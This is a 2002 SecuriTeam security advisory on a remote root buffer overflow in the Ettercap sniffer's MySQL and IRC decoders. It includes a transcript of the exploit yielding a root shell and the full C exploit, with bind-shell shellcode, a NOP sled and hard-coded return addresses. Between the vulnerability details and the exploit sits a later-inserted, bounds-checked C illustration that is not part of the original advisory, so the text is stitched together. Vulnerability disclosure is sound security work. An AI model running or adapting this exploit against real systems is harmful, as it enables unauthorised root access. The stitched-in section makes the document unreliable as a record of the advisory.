[UNIX] Ettercap Remote Root Compromise

From: support@securiteam.com
Date: 02/15/02


From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 15 Feb 2002 01:19:33 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Ettercap Remote Root Compromise
------------------------------------------------------------------------

SUMMARY

Ettercap (http://ettercap.sourceforge.net/) is a multipurpose sniffer /
interceptor / logger for switched LANs. It supports active and passive
dissection of many protocols (even encrypted ones) and includes many
features for network and host analysis. A security vulnerability in its
protocol parsers allows remote attackers to make the program execute
arbitrary code.

DETAILS

Vulnerable systems:
Ettercap 0.6.3.1 and older

Immune systems:
Ettercap 0.6.4

Ettercap is composed of decoders that look for usernames, passwords,
community strings, and other types of sensitive information.

Several decoders (MySQL, IRC and others) suffer from the following
problem:

   memcpy(collector, payload, data_to_ettercap->datalen);

Collector is declared as:

    u_char collector[MAX_DATA];

Where MAX_DATA is:

  #define MAX_DATA 2000

Datalen is the length of the payload (the data after the TCP/UDP header) as
read from the interface, and it is never compared with MAX_DATA before the
copy. So on interfaces whose MTU is higher than 2000 bytes the copy runs past
the end of collector and Ettercap can be exploited. On ordinary Ethernet
(MTU 1500) the bug cannot be exploited, because Ettercap does not reassemble
IP fragments, but Ettercap can still be crashed with a forged packet whose
ip->tot_len is larger than MAX_DATA.
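As an added illustration, not Ettercap's own code and not the fix shipped in 0.6.4 (the advisory does not quote that fix), the following C places the unchecked copy described above next to a bounds-checked version. MAX_DATA and the 2200-byte payload size come from the advisory; the header-length constants, the payload_datalen helper and the try_* wrappers are assumptions made for this example only.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same limit as the advisory quotes for Ettercap 0.6.3.1. */
#define MAX_DATA 2000

/* Assumed minimal IPv4 and TCP header sizes, used only to turn an IP
 * total length into the transport payload length ("datalen"). */
#define IP_HDR_LEN  20
#define TCP_HDR_LEN 20

/* Payload length implied by ip->tot_len and the two header lengths.
 * Returns -1 when the headers alone exceed tot_len (malformed packet). */
long payload_datalen(unsigned tot_len, unsigned ip_hdr_len, unsigned tcp_hdr_len)
{
    if (tot_len < ip_hdr_len + tcp_hdr_len)
        return -1;
    return (long)(tot_len - ip_hdr_len - tcp_hdr_len);
}

/* The advisory's pattern, for comparison (never called here):
 *     memcpy(collector, payload, data_to_ettercap->datalen);
 * datalen comes straight from the wire and is never checked against
 * sizeof(collector), so a payload longer than MAX_DATA overwrites the stack.
 *
 * Bounds-checked replacement: the destination size is passed explicitly and
 * anything larger is refused. Returns bytes copied, or -1 when refused. */
long collect_payload(unsigned char *collector, size_t collector_size,
                     const unsigned char *payload, size_t datalen)
{
    if (collector == NULL || payload == NULL)
        return -1;
    if (datalen > collector_size)
        return -1;                  /* refuse instead of overflowing */
    memcpy(collector, payload, datalen);
    return (long)datalen;
}

/* Truncating variant for decoders that prefer a partial record to a dropped
 * one: copies at most collector_size bytes and reports whether data was lost. */
size_t collect_payload_truncate(unsigned char *collector, size_t collector_size,
                                const unsigned char *payload, size_t datalen,
                                int *truncated)
{
    size_t n = datalen > collector_size ? collector_size : datalen;
    if (truncated != NULL)
        *truncated = (datalen > collector_size);
    memcpy(collector, payload, n);
    return n;
}

/* Scalar wrappers: build a constructed datalen-byte payload of 'A's and feed
 * it to a MAX_DATA-byte collector, so behaviour can be checked with numbers. */
long try_collect(size_t datalen)
{
    static unsigned char collector[MAX_DATA];
    unsigned char *payload = malloc(datalen ? datalen : 1);
    long r;
    if (payload == NULL)
        return -1;
    memset(payload, 'A', datalen);
    r = collect_payload(collector, sizeof collector, payload, datalen);
    free(payload);
    return r;
}

int try_truncate(size_t datalen)   /* 1 if the copy had to be truncated */
{
    static unsigned char collector[MAX_DATA];
    unsigned char *payload = malloc(datalen ? datalen : 1);
    int truncated = 0;
    if (payload == NULL)
        return -1;
    memset(payload, 'A', datalen);
    collect_payload_truncate(collector, sizeof collector, payload, datalen, &truncated);
    free(payload);
    return truncated;
}

int main(void)
{
    /* 1500 bytes (Ethernet MTU) fits; 2200 bytes (the advisory's BUFF_SIZE)
     * is refused rather than copied past the end of collector. */
    printf("payload 1500 -> %ld, payload 2200 -> %ld, tot_len 2240 -> datalen %ld\n",
           try_collect(1500), try_collect(2200),
           payload_datalen(2240, IP_HDR_LEN, TCP_HDR_LEN));
    return 0;
}
```

The check at the boundary matters: exactly MAX_DATA bytes is accepted, MAX_DATA + 1 is refused, which is the difference between a parser that is merely strict and one that still has a one-byte overflow.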

Here are common MTU and interface types:

    65535 Hyperchannel
    17914 16 Mbit/sec token ring
    8166 Token Bus (IEEE 802.4)
    4464 4 Mbit/sec token ring (IEEE 802.5)
    1500 Ethernet
    1500 PPP (typical; can vary widely)

Exploit:
Exploitation is also possible on the loopback interface, where the MTU is 16436:

  piscis:~# ettercap -NszC -i lo &
  [1] 21887
  piscis:~# ./ettercap-x 0 | nc localhost 3306
  ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>
  Next Generation Security Technologies
  http://www.ngsec.com

  punt!
  piscis:~# telnet localhost 36864
  Trying 127.0.0.1...
  Connected to localhost.
  Escape character is '^]'.
  id;
  uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),10(wheel)

Exploit Code:

/*
 * ettercap-0.6.3.1 remote root xploit
 *
 * By: Fermín J. Serna <fjserna@ngsec.com>
 * Next Generation Security Technologies
 * http://www.ngsec.com
 *
 * DESCRIPTION:
 * ============
 *
 * Several decoders (mysql, irc, ...) suffer the following problem:
 *
 * memcpy(collector, payload, data_to_ettercap->datalen);
 *
 * collector is declared as:
 *
 * u_char collector[MAX_DATA];
 *
 * where MAX_DATA is:
 *
 * #define MAX_DATA 2000
 *
 * So on interfaces where MTU is higher than 2000 you can exploit
 * ettercap. Nop, normal ethernets have MTU:1500 ;P
 *
 * Here are common MTU and interface types:
 *
 * 65535 Hyperchannel
 * 17914 16 Mbit/sec token ring
 * 8166 Token Bus (IEEE 802.4)
 * 4464 4 Mbit/sec token ring (IEEE 802.5)
 * 1500 Ethernet
 * 1500 PPP (typical; can vary widely)
 *
 * Sample exploitation could be also in loopback interfaces: MTU:16436
 *
 * piscis:~# ettercap -NszC -i lo &
 * [1] 21887
 * piscis:~# ./ettercap-x 0 | nc localhost mysql
 * ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>
 * Next Generation Security Technologies
 * http://www.ngsec.com
 *
 * punt!
 * piscis:~# telnet localhost 36864
 * Trying 127.0.0.1...
 * Connected to localhost.
 * Escape character is '^]'.
 * id;
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 * Madrid, 5/02/2002
 *
 */

#include <stdio.h>
#include <stdlib.h>   /* atoi() */
#include <string.h>

#define NUM_ADDR 100
#define NOP 0x41
#define BUFF_SIZE 2200
#define RET_ADDR 0xbfffea58
#define OFFSET 0

char shellcode[]=
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"
"/bin/sh";

int main(int argc, char **argv) {
char buffer[BUFF_SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int aux;
int offset=OFFSET;

 fprintf(stderr,"ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>\n");
 fprintf(stderr,"Next Generation Security Technologies\n");
 fprintf(stderr,"http://www.ngsec.com\n\n");

 if (argc==2) offset=atoi(argv[1]);

 memset(buffer,0,sizeof(buffer));

 ch_ptr=buffer;
 /* leading part of the buffer: NOP filler */
 memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);
 ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;
 /* followed by the shellcode */
 memcpy(ch_ptr,shellcode,strlen(shellcode));
 ch_ptr+=strlen(shellcode);
 /* trailing part: NUM_ADDR copies of the return address */
 lg_ptr=(unsigned long *)ch_ptr;
 for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
 ch_ptr=(char *)lg_ptr;
 *ch_ptr='\0';
  
 printf("%s",buffer);

 return(0);

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:fjserna@ngsec.com> Fermin J.
Serna.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


